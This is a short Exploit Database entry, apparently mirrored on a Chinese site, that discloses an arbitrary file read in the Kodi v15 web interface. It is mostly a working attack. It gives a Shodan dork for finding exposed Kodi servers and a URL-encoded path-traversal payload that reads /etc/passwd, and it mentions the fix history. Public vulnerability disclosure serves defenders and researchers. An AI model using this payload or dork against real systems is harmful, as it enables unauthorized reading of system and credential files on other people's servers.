Kodi 15 – Web Interface Arbitrary File Access

• Exploit Database
• 40 阅读

• 作者： Machiel Pronk
  日期： 2015-12-01
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/38833/

• # Exploit Title: arbitrary file access kodi web interface
  # Shodan dork: title:kodi
  # Date: 25-11-2015
  # Contact: https://twitter.com/mpronk89
  # Software Link: http://kodi.tv/
  # Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
  # Version: v15
  # Tested on: linux
  # CVE : n/a
  
  kodi web interface vulnerable to arbitrary file read.
  
  example:
  <ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  
  
  for passwd
  
  ​(issue fixed in 2012, reintroduced in february 2015. Fixed again november
  2015 for v16)